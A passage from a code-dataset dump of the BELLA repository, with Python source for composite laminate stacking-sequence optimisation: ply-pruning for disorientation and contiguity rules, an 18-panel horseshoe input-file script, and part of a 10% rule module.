constraints.dam_tol_rule == 2:\r\n for ind in range(child_ss.size)[:: -1]:\r\n if child_ss[ind] != - mother_ss_bot[0]:\r\n child_ss = np.delete(child_ss, np.s_[ind], axis=0)\r\n\r\n elif constraints.dam_tol_rule == 3:\r\n for ind in range(child_ss.size)[:: -1]:\r\n if child_ss[ind] not in my_set:\r\n child_ss = np.delete(child_ss, np.s_[ind], axis=0)\r\n continue\r\n # diso\r\n if constraints.diso \\\r\n and not is_diso(-45, 45, constraints.delta_angle):\r\n if child_ss[ind] != - mother_ss_bot[0]:\r\n child_ss = np.delete(\r\n child_ss, np.s_[ind], axis=0)\r\n\r\n if child_ss.size == 0:\r\n return None\r\n return child_ss\r\n\r\n if level == targets.n_plies - 2 and not constraints.sym:\r\n\r\n if constraints.dam_tol_rule == 2:\r\n for ind in range(child_ss.size)[:: -1]:\r\n if child_ss[ind] != - mother_ss_top[-1]:\r\n child_ss = np.delete(child_ss, np.s_[ind], axis=0)\r\n\r\n elif constraints.dam_tol_rule == 3:\r\n for ind in range(child_ss.size)[:: -1]:\r\n if child_ss[ind] not in my_set:\r\n child_ss = np.delete(child_ss, np.s_[ind], axis=0)\r\n continue\r\n # diso\r\n if constraints.diso \\\r\n and not is_diso(-45, 45, constraints.delta_angle):\r\n if child_ss[ind] != - mother_ss_top[-1]:\r\n child_ss = np.delete(\r\n child_ss, np.s_[ind], axis=0)\r\n\r\n if child_ss.size == 0:\r\n return None\r\n return child_ss\r\n\r\n# =============================================================================\r\n# pruning for disorientation\r\n# =============================================================================\r\n if constraints.diso:\r\n if constraints.sym or level % 2: # plies at the laminate bottom part\r\n # externally with ss_bot_simp\r\n if ss_bot_simp.size > 0 and mother_ss_bot.size == 0:\r\n for ind in range(child_ss.size)[:: -1]:\r\n if not is_diso(child_ss[ind], ss_bot_simp[-1],\r\n constraints.delta_angle):\r\n child_ss = np.delete(child_ss, np.s_[ind], axis=0)\r\n # internally\r\n elif mother_ss_bot.size > 0:\r\n for ind in range(child_ss.size)[:: -1]:\r\n if not is_diso(child_ss[ind], mother_ss_bot[-1],\r\n constraints.delta_angle):\r\n child_ss = np.delete(child_ss, np.s_[ind], axis=0)\r\n\r\n else: # asymetric laminate top part\r\n # externally with ss_top_simp\r\n if ss_top_simp.size > 0 and mother_ss_top.size == 0:\r\n for ind in range(child_ss.size)[:: -1]:\r\n if not is_diso(child_ss[ind], ss_top_simp[0],\r\n constraints.delta_angle):\r\n child_ss = np.delete(child_ss, np.s_[ind], axis=0)\r\n # internally\r\n if mother_ss_top.size > 0:\r\n for ind in range(child_ss.size)[:: -1]:\r\n if not is_diso(child_ss[ind], mother_ss_top[0],\r\n constraints.delta_angle):\r\n child_ss = np.delete(child_ss, np.s_[ind], axis=0)\r\n\r\n if not constraints.sym and level == targets.n_plies - 1:\r\n # last ply asymmetric laminates\r\n if not level % 2: # check compatibility with laminate bottom part\r\n for ind in range(child_ss.size)[:: -1]:\r\n if not is_diso(child_ss[ind], mother_ss_bot[-1],\r\n constraints.delta_angle):\r\n child_ss = np.delete(child_ss, np.s_[ind], axis=0)\r\n else: # check compatibility with laminate top part\r\n for ind in range(child_ss.size)[:: -1]:\r\n if not is_diso(child_ss[ind], mother_ss_top[0],\r\n constraints.delta_angle):\r\n child_ss = np.delete(child_ss, np.s_[ind], axis=0)\r\n\r\n if child_ss.size == 0:\r\n return None\r\n# =============================================================================\r\n# # pruning for the contiguity constraint\r\n# =============================================================================\r\n if constraints.contig:\r\n\r\n # laminate bottom part but not last ply\r\n if (constraints.sym \\\r\n and not level == targets.n_plies // 2 + targets.n_plies % 2 - 1)\\\r\n or (not constraints.sym and not level == targets.n_plies - 1):\r\n\r\n for ind in range(child_ss.size)[:: -1]:\r\n # externally with ss_bot_simp\r\n test, _ = external_contig(\r\n angle=np.array((child_ss[ind],)),\r\n n_plies_group=1,\r\n constraints=constraints,\r\n ss_before=np.hstack((ss_bot_simp, mother_ss_bot)))\r\n if test.size == 0:\r\n child_ss = np.delete(child_ss, np.s_[ind], axis=0)\r\n continue\r\n\r\n # plies at the laminate bottom part but not last ply\r\n elif not constraints.sym and not level % 2 \\\r\n and not level == targets.n_plies - 1:\r\n\r\n for ind in range(child_ss.size)[:: -1]:\r\n\r\n # externally with ss_top_simp\r\n test, _ = external_contig(\r\n angle=np.array((child_ss[ind],)),\r\n n_plies_group=1,\r\n constraints=constraints,\r\n ss_before=np.flip(\r\n np.hstack((mother_ss_top, ss_top_simp)), axis=0))\r\n if test.size == 0:\r\n child_ss = np.delete(child_ss, np.s_[ind], axis=0)\r\n continue\r\n\r\n # last ply of symmetric laminate\r\n elif constraints.sym \\\r\n and level == targets.n_plies // 2 + targets.n_plies % 2 - 1:\r\n\r\n ss_before = mother_ss_bot[\r\n mother_ss_bot.size - constraints.n_contig:]\r\n if ss_before.size < constraints.n_contig:\r\n ss_before = np.hstack((\r\n ss_bot_simp[ss_bot_simp.size \\\r\n - constraints.n_contig + ss_before.size:],\r\n ss_before))\r\n\r\n if targets.n_plies % 2 == 0: # no middle ply\r\n\r\n for ind in range(child_ss.size)[:: -1]:\r\n new_stack = np.hstack((\r\n ss_before,\r\n child_ss[ind],\r\n child_ss[ind],\r\n np.flip(ss_before, axis=0)))\r\n if not internal_contig2(new_stack, constraints):\r\n child_ss = np.delete(child_ss, np.s_[ind], axis=0)\r\n\r\n else: # a middle ply\r\n for ind in range(child_ss.size)[:: -1]:\r\n new_stack = np.hstack((\r\n ss_before,\r\n child_ss[ind],\r\n np.flip(ss_before, axis=0)))\r\n if not internal_contig2(new_stack, constraints):\r\n child_ss = np.delete(child_ss, np.s_[ind], axis=0)\r\n\r\n # plies at the laminate bottom part and not last ply\r\n elif not constraints.sym and level == targets.n_plies - 1:\r\n\r\n ss_before = mother_ss_bot[\r\n mother_ss_bot.size - constraints.n_contig:]\r\n if ss_before.size < constraints.n_contig:\r\n ss_before = np.hstack((\r\n ss_bot_simp[ss_bot_simp.size \\\r\n - constraints.n_contig + ss_before.size:],\r\n ss_before))\r\n\r\n ss_after = mother_ss_top[:constraints.n_contig]\r\n if ss_after.size < constraints.n_contig:\r\n ss_after = np.hstack((\r\n ss_after,\r\n ss_top_simp[:constraints.n_contig - ss_after.size:]))\r\n\r\n for ind in range(child_ss.size)[:: -1]:\r\n if not internal_contig2(\r\n new_stack=np.hstack((\r\n ss_before, child_ss[ind], ss_after)),\r\n constraints=constraints):\r\n child_ss = np.delete(child_ss, np.s_[ind], axis=0)\r\n\r\n if child_ss.size == 0:\r\n return None\r\n\r\n return child_ss\r\n"
},
{
"alpha_fraction": 0.4839400351047516,
"alphanum_fraction": 0.5793055891990662,
"avg_line_length": 36.00581359863281,
"blob_id": "5379aaf41bb40b756d3169825e669fda66b6748d",
"content_id": "c089bd7cb03d757d83e283af9bbf8cf57e394d5f",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 13076,
"license_type": "permissive",
"max_line_length": 79,
"num_lines": 344,
"path": "/input-files/create_input_file_horseshoe.py",
"repo_name": "noemiefedon/BELLA",
"src_encoding": "UTF-8",
"text": "# -*- coding: utf-8 -*-\r\n\"\"\"\r\nThis script saves the input file for the horseshoe problem.\r\n\"\"\"\r\n__version__ = '1.0'\r\n__author__ = 'Noemie Fedon'\r\n\r\nimport sys\r\nimport numpy as np\r\nimport numpy.matlib\r\n\r\nsys.path.append(r'C:\\BELLA')\r\nfrom src.divers.excel import autofit_column_widths\r\nfrom src.divers.excel import delete_file\r\nfrom src.BELLA.save_set_up import save_constraints_BELLA\r\nfrom src.BELLA.save_set_up import save_objective_function_BELLA\r\nfrom src.BELLA.save_set_up import save_multipanel\r\nfrom src.BELLA.save_set_up import save_materials\r\nfrom src.BELLA.panels import Panel\r\nfrom src.BELLA.multipanels import MultiPanel\r\nfrom src.BELLA.constraints import Constraints\r\nfrom src.BELLA.obj_function import ObjFunction\r\nfrom src.BELLA.materials import Material\r\n\r\nfilename = 'input_file_horseshoe.xlsx'\r\n\r\n# check for authorisation before overwriting\r\ndelete_file(filename)\r\n\r\nn_panels = 18\r\n\r\n### Design guidelines ---------------------------------------------------------\r\n\r\nconstraints_set = 'C0'\r\nconstraints_set = 'C1'\r\n\r\n# constraints_set == 'C0' ->\r\n# - ply-drop spacing rule enforced with a minimum of\r\n# constraints.min_drop plies between ply drops at panel boundaries\r\n# - covering rule enforced by preventing the drop of the\r\n# constraints.n_covering outermost plies on each laminate surface\r\n# - symmetry rule enforced, no other lay-up rules\r\n#\r\n# constraints_set == 'C1' ->\r\n# - ply-drop spacing rule enforced with a minimum of\r\n# constraints.min_drop plies between ply drops at panel boundaries\r\n# - covering enforrced by preventing the drop of the\r\n# constraints.n_covering outermost plies on each laminate surface\r\n# - symmetry rule enforced\r\n# - 10% rule enforced\r\n# if rule_10_Abdalla == True rule applied by restricting LPs instead of\r\n# ply percentages and percent_Abdalla is the percentage limit of the\r\n# rule\r\n# otherwise:\r\n# if combined_45_135 == True the restrictions are:\r\n# - a maximum percentage of constraints.percent_0 0 deg plies\r\n# - a maximum percentage of constraints.percent_90 90 deg plies\r\n# - a maximum percentage of constraints.percent_45_135 +-45 deg plies\r\n# if combined_45_135 == False the restrictions are:\r\n# - a maximum percentage of constraints.percent_0 0 deg plies\r\n# - a maximum percentage of constraints.percent_90 90 deg plies\r\n# - a maximum percentage of constraints.percent_45 45 deg plies\r\n# - a maximum percentage of constraints.percent_135 -45 deg plies\r\n# - disorientation rule enforced with variation of fibre angle between\r\n# adacent plies limited to a maximum value of constraints.delta_angle\r\n# degrees\r\n# - contiguity rule enforced with no more than constraints.n_contig\r\n# adajacent plies with same fibre angle\r\n# - damage tolerance rule enforced\r\n# if constraints.dam_tol_rule == 1 the restrictions are:\r\n# - one outer ply at + or -45 deg at the laminate surfaces\r\n# (2 plies intotal)\r\n# if constraints.dam_tol_rule == 2 the restrictions are:\r\n# - [+45, -45] or [-45, +45] at the laminate surfaces\r\n# (4 plies in total)\r\n# if constraints.dam_tol_rule == 3 the restrictions are:\r\n# - [+45,-45] [-45,+45] [+45,+45] or [-45,-45] at the laminate\r\n# surfaces (4 plies in total)\r\n# - out-of-plane orthotropy rule enforced to have small absolutes values\r\n# of LP_11 and LP_12 such that the values of D16 and D26 are small too\r\n\r\n## lay-up rules\r\n\r\n# set of admissible fibre orientations\r\nset_of_angles = np.array([-45, 0, 45, 90], dtype=int)\r\nset_of_angles = np.array([\r\n -45, 0, 45, 90, +30, -30, +60, -60, 15, -15, 75, -75], dtype=int)\r\n\r\nsym = True # symmetry rule\r\noopo = False # out-of-plane orthotropy requirements\r\n\r\nif constraints_set == 'C0':\r\n bal = False # balance rule\r\n rule_10_percent = False # 10% rule\r\n diso = False # disorientation rule\r\n contig = False # contiguity rule\r\n dam_tol = False # damage-tolerance rule\r\nelse:\r\n bal = True\r\n rule_10_percent = True\r\n diso = True\r\n contig = True\r\n dam_tol = True\r\n\r\nrule_10_Abdalla = True # 10% rule restricting LPs instead of ply percentages\r\npercent_Abdalla = 10 # percentage limit for the 10% rule applied on LPs\r\ncombine_45_135 = True # True if restriction on +-45 plies combined for 10% rule\r\npercent_0 = 10 # percentage used in the 10% rule for 0 deg plies\r\npercent_45 = 0 # percentage used in the 10% rule for +45 deg plies\r\npercent_90 = 10 # percentage used in the 10% rule for 90 deg plies\r\npercent_135 = 0 # percentage used in the 10% rule for -45 deg plies\r\npercent_45_135 =10 # percentage used in the 10% rule for +-45 deg plies\r\ndelta_angle = 45 # maximum angle difference for adjacent plies\r\nn_contig = 5 # maximum number of adjacent plies with the same fibre orientation\r\ndam_tol_rule = 1 # type of damage tolerance rule\r\n\r\n## ply-drop rules\r\n\r\ncovering = True # covering rule\r\nn_covering = 1 # number of plies ruled by covering rule at laminate surfaces\r\npdl_spacing = True # ply drop spacing rule\r\nmin_drop = 2 # Minimum number of continuous plies between ply drops\r\n\r\nconstraints = Constraints(\r\n sym=sym,\r\n bal=bal,\r\n oopo=oopo,\r\n dam_tol=dam_tol,\r\n dam_tol_rule=dam_tol_rule,\r\n covering=covering,\r\n n_covering=n_covering,\r\n rule_10_percent=rule_10_percent,\r\n rule_10_Abdalla=rule_10_Abdalla,\r\n percent_Abdalla=percent_Abdalla,\r\n percent_0=percent_0,\r\n percent_45=percent_45,\r\n percent_90=percent_90,\r\n percent_135=percent_135,\r\n percent_45_135=percent_45_135,\r\n combine_45_135=combine_45_135,\r\n diso=diso,\r\n contig=contig,\r\n n_contig=n_contig,\r\n delta_angle=delta_angle,\r\n set_of_angles=set_of_angles,\r\n min_drop=min_drop,\r\n pdl_spacing=pdl_spacing)\r\n\r\n### Objective function parameters ---------------------------------------------\r\n\r\n# Coefficient for the 10% rule penalty\r\ncoeff_10 = 1\r\n# Coefficient for the contiguity constraint penalty\r\ncoeff_contig = 1\r\n# Coefficient for the disorientation constraint penalty\r\ncoeff_diso = 10\r\n# Coefficient for the out-of-plane orthotropy penalty\r\ncoeff_oopo = 1\r\n\r\n# Lamination-parameter weightings in panel objective functions\r\n# (In practice these weightings can be different for each panel)\r\nlampam_weightings = np.array([0, 0, 0, 0, 0, 0, 0, 0, 1, 1, 0, 0])\r\n\r\n## Multi-panel objective function\r\n\r\n# Weightings of the panels in the multi-panel objecive function\r\npanel_weightings = np.ones((n_panels,), float)\r\n\r\n# Coefficient for the ply drop spacing guideline penalty\r\ncoeff_spacing = 1\r\n\r\nobj_func_param = ObjFunction(\r\n constraints=constraints,\r\n coeff_contig=coeff_contig,\r\n coeff_diso=coeff_diso,\r\n coeff_10=coeff_10,\r\n coeff_oopo=coeff_oopo,\r\n coeff_spacing=coeff_spacing)\r\n\r\n### Multi-panel composite laminate layout -------------------------------------\r\n\r\n# panel IDs\r\nID = [1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14, 15, 16, 17, 18]\r\n\r\n# number of panels\r\nn_panels = len(ID)\r\n\r\n# panel number of plies\r\nn_plies = [32, 28, 20, 18, 16, 22, 18, 24, 38,\r\n 34, 30, 28, 22, 18, 24, 30, 18, 22]\r\n\r\n# panels adjacency\r\nneighbour_panels = {\r\n 1 : [2, 9],\r\n 2 : [1, 3, 6, 10],\r\n 3 : [2, 4, 6],\r\n 4 : [3, 5, 7],\r\n 5 : [4, 8],\r\n 6 : [2, 3, 7],\r\n 7 : [4, 6, 8],\r\n 8 : [5, 7],\r\n 9 : [1, 10, 11],\r\n 10 : [2, 9, 12],\r\n 11 : [9, 12],\r\n 12 : [10, 11, 13, 16],\r\n 13 : [12, 14, 16],\r\n 14 : [13, 15, 17],\r\n 15 : [14, 18],\r\n 16 : [12, 13, 17],\r\n 17 : [14, 16, 18],\r\n 18 : [15, 17]}\r\n\r\n# boundary weights\r\nboundary_weights = {(1, 2) : 0.610,\r\n (1, 9) : 0.457,\r\n (2, 3) : 0.305,\r\n (2, 6) : 0.305,\r\n (2, 10) : 0.457,\r\n (3, 4) : 0.305,\r\n (3, 6) : 0.508,\r\n (4, 5) : 0.305,\r\n (4, 7) : 0.508,\r\n (5, 8) : 0.508,\r\n (6, 7) : 0.305,\r\n (7, 8) : 0.305,\r\n (9, 10) : 0.610,\r\n (9, 11) : 0.457,\r\n (10, 12) : 0.457,\r\n (11, 12) : 0.610,\r\n (12, 13) : 0.305,\r\n (12, 16) : 0.305,\r\n (13, 14) : 0.305,\r\n (13, 16) : 0.508,\r\n (14, 15) : 0.305,\r\n (14, 17) : 0.508,\r\n (15, 18) : 0.508,\r\n (16, 17) : 0.305,\r\n (17, 18) : 0.305}\r\n\r\n# panel length in the x-direction (m)\r\nlength_x = (25.40/1000)*np.array([18, 18, 20, 20, 20, 20, 20, 20,\r\n 18, 18, 18, 18, 20, 20, 20, 20, 20, 20])\r\n\r\n# panel length in the y-direction (m)\r\nlength_y = (25.40/1000)*np.array([24, 24, 12, 12, 12, 12, 12, 12,\r\n 24, 24, 24, 24, 12, 12, 12, 12, 12, 12])\r\n\r\n# 1 lbf/in = 0.175127 N/mm\r\n# panel loading per unit width in the x-direction in N/m\r\nN_x = 175.127*np.array([700, 375, 270, 250, 210, 305, 290, 600,\r\n 1100, 900, 375, 400, 330, 190, 300, 815, 320, 300])\r\n\r\n# panel loading per unit width in the y-direction in N/m\r\nN_y = 175.127*np.array([400, 360, 325, 200, 100, 360, 195, 480,\r\n 600, 400, 525, 320, 330, 205, 610, 1000, 180, 410])\r\n\r\n\r\n# panel amination parameters targets\r\nlampam_targets = [np.array([0, 0, 0, 0, 0, 0, 0, 0, 0.208, -0.843, 0, 0]),\r\n np.array([0, 0, 0, 0, 0, 0, 0, 0, 0.092, -0.714, 0, 0]),\r\n np.array([0, 0, 0, 0, 0, 0, 0, 0, -0.722, 0.054, 0, 0]),\r\n np.array([0, 0, 0, 0, 0, 0, 0, 0, -0.582, -0.228, 0, 0]),\r\n np.array([0, 0, 0, 0, 0, 0, 0, 0, -0.477, -0.235, 0, 0]),\r\n np.array([0, 0, 0, 0, 0, 0, 0, 0, -0.469, -0.335, 0, 0]),\r\n np.array([0, 0, 0, 0, 0, 0, 0, 0, -0.582, -0.288, 0, 0]),\r\n np.array([0, 0, 0, 0, 0, 0, 0, 0, -0.597, -0.252, 0, 0]),\r\n np.array([0, 0, 0, 0, 0, 0, 0, 0, 0.192, -0.657, 0, 0]),\r\n np.array([0, 0, 0, 0, 0, 0, 0, 0, 0.308, -0.776, 0, 0]),\r\n np.array([0, 0, 0, 0, 0, 0, 0, 0, -0.241, -0.816, 0, 0]),\r\n np.array([0, 0, 0, 0, 0, 0, 0, 0, 0.092, -0.714, 0, 0]),\r\n np.array([0, 0, 0, 0, 0, 0, 0, 0, -0.469, -0.335, 0, 0]),\r\n np.array([0, 0, 0, 0, 0, 0, 0, 0, -0.582, -0.228, 0, 0]),\r\n np.array([0, 0, 0, 0, 0, 0, 0, 0, -0.597, -0.252, 0, 0]),\r\n np.array([0, 0, 0, 0, 0, 0, 0, 0, -0.241, -0.816, 0, 0]),\r\n np.array([0, 0, 0, 0, 0, 0, 0, 0, -0.582, -0.228, 0, 0]),\r\n np.array([0, 0, 0, 0, 0, 0, 0, 0, -0.469, -0.335, 0, 0])]\r\n\r\npanels = []\r\nfor ind_panel in range(n_panels):\r\n panels.append(Panel(\r\n ID=ID[ind_panel],\r\n lampam_target=lampam_targets[ind_panel],\r\n lampam_weightings=lampam_weightings,\r\n n_plies=n_plies[ind_panel],\r\n length_x=length_x[ind_panel],\r\n length_y=length_y[ind_panel],\r\n N_x=N_x[ind_panel],\r\n N_y=N_y[ind_panel],\r\n weighting=panel_weightings[ind_panel],\r\n neighbour_panels=neighbour_panels[ID[ind_panel]],\r\n constraints=constraints))\r\n\r\n\r\nmultipanel = MultiPanel(panels, boundary_weights)\r\nmultipanel.filter_target_lampams(constraints, obj_func_param)\r\nmultipanel.filter_lampam_weightings(constraints, obj_func_param)\r\n\r\n### Objective function parameters ---------------------------------------------\r\n\r\n# Coefficient for the 10% rule penalty\r\ncoeff_10 = 1\r\n# Coefficient for the contiguity constraint penalty\r\ncoeff_contig = 1\r\n# Coefficient for the disorientation constraint penalty\r\ncoeff_diso = 1\r\n# Coefficient for the out-of-plane orthotropy penalty\r\ncoeff_oopo = 1\r\n# Coefficient for the ply drop spacing guideline penalty\r\ncoeff_spacing = 1\r\n\r\nobj_func_param = ObjFunction(\r\n constraints=constraints,\r\n coeff_contig=coeff_contig,\r\n coeff_diso=coeff_diso,\r\n coeff_10=coeff_10,\r\n coeff_oopo=coeff_oopo,\r\n coeff_spacing=coeff_spacing)\r\n\r\n### Material properties -------------------------------------------------------\r\n\r\n# Elastic modulus in the fibre direction in Pa\r\nE11 = 20.5/1.45038e-10 # 141 GPa\r\n# Elastic modulus in the transverse direction in Pa\r\nE22 = 1.31/1.45038e-10 # 9.03 GPa\r\n# Poisson's ratio relating transverse deformation and axial loading (-)\r\nnu12 = 0.32\r\n# In-plane shear modulus in Pa\r\nG12 = 0.62/1.45038e-10 # 4.27 GPa\r\n# Density in g/m2\r\ndensity_area = 300.5\r\n# Ply thickness in m\r\nply_t = (25.40/1000)*0.0075 # 0.191 mmm\r\n\r\nmaterials = Material(E11=E11, E22=E22, G12=G12, nu12=nu12,\r\n density_area=density_area, ply_t=ply_t)\r\n\r\n### Saving everything on an excel file ----------------------------------------\r\n\r\nsave_multipanel(filename, multipanel, obj_func_param, calc_penalties=False,\r\n constraints=constraints, mat=materials, save_buckling=True)\r\nsave_constraints_BELLA(filename, constraints)\r\nsave_objective_function_BELLA(filename, obj_func_param)\r\nsave_materials(filename, materials)\r\nautofit_column_widths(filename)\r\n\r\n"
},
{
"alpha_fraction": 0.4797810912132263,
"alphanum_fraction": 0.552325963973999,
"avg_line_length": 40.053707122802734,
"blob_id": "7d4dbba172df667349690995cc71fbb4d3311779",
"content_id": "bfe351fda92f9ab5dd8b2c37c45e8276a3754aee",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 16445,
"license_type": "permissive",
"max_line_length": 636,
"num_lines": 391,
"path": "/src/guidelines/ten_percent_rule.py",
"repo_name": "noemiefedon/BELLA",
"src_encoding": "UTF-8",
"text": "# -*- coding: utf-8 -*-\r\n\"\"\"\r\nApplication of the 10% rule for the design of a laminate\r\n\r\n- display_ply_counts\r\n displays the ply counts in each fibre direction for a laminate lay-up\r\n\r\n- is_ten_percent_rule\r\n returns True for a panel stacking sequence satisfying the 10% rule,\r\n False otherwise\r\n\r\n- calc_penalty_10_ss and calc_penalty_10_pc\r\n returns the stacking sequence penalty for 10% rule\r\n\r\n- ten_percent_rule\r\n returns only the stacking sequences that satisfy the 10% rule when added to\r\n plies for which the ply orientations have been previously determined\r\n\r\n- calc_n_plies_per_angle\r\n returns the ply counts in each fibre direction\r\n\"\"\"\r\n__version__ = '1.0'\r\n__author__ = 'Noemie Fedon'\r\n\r\nimport sys\r\nimport numpy as np\r\nimport math\r\n\r\nsys.path.append(r'C:\\BELLA')\r\nfrom src.BELLA.constraints import Constraints\r\nfrom src.divers.pretty_print import print_list_ss\r\nfrom src.guidelines.ten_percent_rule_Abdalla import calc_distance_Abdalla\r\n\r\ndef display_ply_counts(stack, constraints):\r\n '''\r\n displays the ply counts in each fibre direction for a laminate lay-up\r\n\r\n INPUTS\r\n\r\n - stack (array): stacking sequence\r\n - constraints (instance of the class Constraints): set of design guidelines\r\n '''\r\n print('number of 0 plies: ', sum(stack == 0))\r\n for angle in constraints.angles_bal[:, 0]:\r\n print('number of +' + str(angle) + ' plies: ', sum(stack == angle))\r\n print('number of -' + str(angle) + ' plies: ', sum(stack == -angle))\r\n print('number of 90 plies: ', sum(stack == 90))\r\n return 0\r\n\r\n\r\ndef calc_ply_counts(multipanel, stacks, constraints):\r\n \"\"\"\r\n calculates the ply counts in each fibre angle per panel in a multi-panel\r\n composite laminate structure\r\n\r\n Args:\r\n constraints (instance of the class Constraints): set of design\r\n guidelines\r\n stack (numpy array): panel stacking sequences\r\n\r\n Returns:\r\n ply counts in each fibre angle per panel in a multi-panel composite\r\n laminate structure\r\n \"\"\"\r\n n_plies_per_angles = np.zeros((\r\n multipanel.reduced.n_panels, constraints.n_set_of_angles),\r\n dtype='float16')\r\n for ind_panel in range(multipanel.reduced.n_panels):\r\n for index in range(len(stacks[ind_panel])):\r\n index = constraints.ind_angles_dict[stacks[ind_panel][index]]\r\n n_plies_per_angles[ind_panel][index] += 1\r\n return n_plies_per_angles\r\n\r\ndef is_ten_percent_rule(\r\n constraints, stack=None, ply_queue=None, n_plies_per_angle=None,\r\n equality_45_135=False, equality_0_90=False, LPs=None):\r\n \"\"\"\r\n checks the satisfaction to the 10% rule\r\n\r\n Args:\r\n constraints (instance of the class Constraints): set of design\r\n guidelines\r\n stack (numpy array): partial stacking sequence with the angle 666 used\r\n for unknown ply fibre orientations\r\n ply_queue (list): ply fibre orientations for the remaining plies in the\r\n stacking sequence\r\n n_plies_per_angle (numpy array): ply counts in each fibre orientation\r\n equality_45_135 (boolean): True if +45/-45 plies are not differentiated\r\n equality_0_90 (boolean): True if 0/90 plies are not differentiated\r\n\r\n Returns:\r\n boolean: True if the stacking sequence 'stack' satisfies the 10% rule,\r\n False otherwise.\r\n\r\n Examples:\r\n >>> constraints=Constraints(rule_10_percent=True, percent_0=50)\r\n >>> is_ten_percent_rule(constraints, stack=np.array([0, 45, 90], int))\r\n False\r\n \"\"\"\r\n if constraints.rule_10_percent and constraints.rule_10_Abdalla \\\r\n and LPs is not None:\r\n if math.pow((1 - 4 * constraints.percent_Abdalla), 2) \\\r\n + (1 - 4 * constraints.percent_Abdalla) * LPs[1] \\\r\n - 2 * math.pow(LPs[0], 2) + 1e-15 < 0:\r\n return False\r\n if 1 - 4 * constraints.percent_Abdalla - LPs[1] + 1e-15 < 0:\r\n return False\r\n return True\r\n\r\n if n_plies_per_angle is not None:\r\n if constraints.percent_tot > 0:\r\n n_total = sum(n_plies_per_angle)\r\n percent_0 = n_plies_per_angle[constraints.index0] / n_total\r\n percent_45 = n_plies_per_angle[constraints.index45] / n_total\r\n percent_90 = n_plies_per_angle[constraints.index90] / n_total\r\n percent_135 = n_plies_per_angle[constraints.index135] / n_total\r\n if percent_0 < constraints.percent_0 \\\r\n or percent_45 < constraints.percent_45 \\\r\n or percent_90 < constraints.percent_90 \\\r\n or percent_135 < constraints.percent_135 \\\r\n or percent_45 + percent_135 < constraints.percent_45_135:\r\n return False\r\n return True\r\n\r\n if isinstance(stack, list):\r\n n_total = len(stack)\r\n else:\r\n n_total = stack.size\r\n\r\n if ply_queue is not None:\r\n\r\n if constraints.sym:\r\n percent_0 = 2 * (\r\n sum(stack[:stack.size // 2] == 0) + ply_queue.count(0))\r\n percent_45 = 2 * (\r\n sum(stack[:stack.size // 2] == 45) + ply_queue.count(45))\r\n percent_90 = 2 * (\r\n sum(stack[:stack.size // 2] == 90) + ply_queue.count(90))\r\n percent_135 = 2 * (\r\n sum(stack[:stack.size // 2] == -45) + ply_queue.count(-45))\r\n if stack.size % 2:\r\n mid_ply_angle = stack[stack.size % 2]\r\n if mid_ply_angle == 0:\r\n percent_0 += 1\r\n if mid_ply_angle == 90:\r\n percent_90 += 1\r\n if mid_ply_angle == 45:\r\n percent_45 += 1\r\n if mid_ply_angle == -45:\r\n percent_135 += 1\r\n else:\r\n percent_0 = sum(stack == 0) + ply_queue.count(0)\r\n percent_45 = sum(stack == 45) + ply_queue.count(45)\r\n percent_90 = sum(stack == 90) + ply_queue.count(90)\r\n percent_135 = sum(stack == -45) + ply_queue.count(-45)\r\n else:\r\n percent_0 = sum(stack == 0)\r\n percent_45 = sum(stack == 45)\r\n percent_90 = sum(stack == 90)\r\n percent_135 = sum(stack == -45)\r\n\r\n percent_0 /= n_total\r\n percent_45 /= n_total\r\n percent_90 /= n_total\r\n percent_135 /= n_total\r\n\r\n# print(percent_0, constraints.percent_0)\r\n# print(percent_90, constraints.percent_90)\r\n# print(percent_45, constraints.percent_45)\r\n# print(percent_135, constraints.percent_135)\r\n# print(percent_45 + percent_135, constraints.percent_45_135)\r\n\r\n if not equality_0_90 and (percent_0 + 1e-15 < constraints.percent_0\\\r\n or percent_90 + 1e-15 < constraints.percent_90):\r\n return False\r\n\r\n if equality_0_90 and (percent_0 + percent_90 + 1e-15 \\\r\n < constraints.percent_0 + constraints.percent_90):\r\n return False\r\n\r\n if not equality_45_135 and (percent_45 + 1e-15 < constraints.percent_45 \\\r\n or percent_135 + 1e-15 < constraints.percent_135):\r\n return False\r\n\r\n if equality_45_135 and (percent_45 + percent_135 + 1e-15 < \\\r\n constraints.percent_45 + constraints.percent_135):\r\n return False\r\n\r\n if percent_45 + percent_135 + 1e-15 < constraints.percent_45_135:\r\n return False\r\n\r\n return True\r\n\r\n\r\ndef calc_penalty_10_ss(ss, constraints, LPs=None, mp=False):\r\n \"\"\"\r\n returns the stacking sequence penalty for 10% rule\r\n\r\n INPUTS\r\n\r\n - ss: stacking sequences\r\n - constraints: design guidelines\r\n - mp = true: for when the input is a list of stacking sequences\r\n \"\"\"\r\n\r\n if constraints.rule_10_percent and constraints.rule_10_Abdalla \\\r\n and LPs is not None:\r\n if not mp:\r\n return calc_distance_Abdalla(LPs, constraints)\r\n else:\r\n return np.array([calc_distance_Abdalla(lps, constraints) \\\r\n for lps in LPs])\r\n\r\n if constraints.percent_tot > 0:\r\n if not mp:\r\n ss = np.array(ss)\r\n n_total = ss.size\r\n percent_0 = np.sum(ss == 0)/n_total\r\n percent_45 = np.sum(ss == 45)/n_total\r\n percent_90 = np.sum(ss == 90)/n_total\r\n percent_135 = np.sum(ss == -45)/n_total\r\n return (max(0, constraints.percent_0 - percent_0)\r\n + max(0, constraints.percent_45 - percent_45)\r\n + max(0, constraints.percent_90 - percent_90)\r\n + max(0, constraints.percent_135 - percent_135)\r\n + max(0,\r\n constraints.percent_45_135 - percent_45-percent_135))\r\n else:\r\n if isinstance(ss, list): length = len(ss)\r\n else: length = ss.shape[0]\r\n penalties = np.zeros((length,))\r\n for ind_ss in range(length):\r\n penalties[ind_ss] = calc_penalty_10_ss(ss[ind_ss], constraints)\r\n return penalties\r\n\r\n if not mp:\r\n return 0\r\n return np.zeros((ss.shape[0],))\r\n\r\n\r\ndef calc_penalty_10_pc(n_plies_per_angle, constraints, cummul_areas=1):\r\n \"\"\"\r\n returns the penalty for 10% rule based on n_plies_per_angle\r\n \"\"\"\r\n if constraints.percent_tot > 0:\r\n if (isinstance(n_plies_per_angle, np.ndarray) \\\r\n and n_plies_per_angle.ndim == 1)\\\r\n or isinstance(n_plies_per_angle, list):\r\n n_total = sum(n_plies_per_angle)\r\n if n_total:\r\n percent_0 = 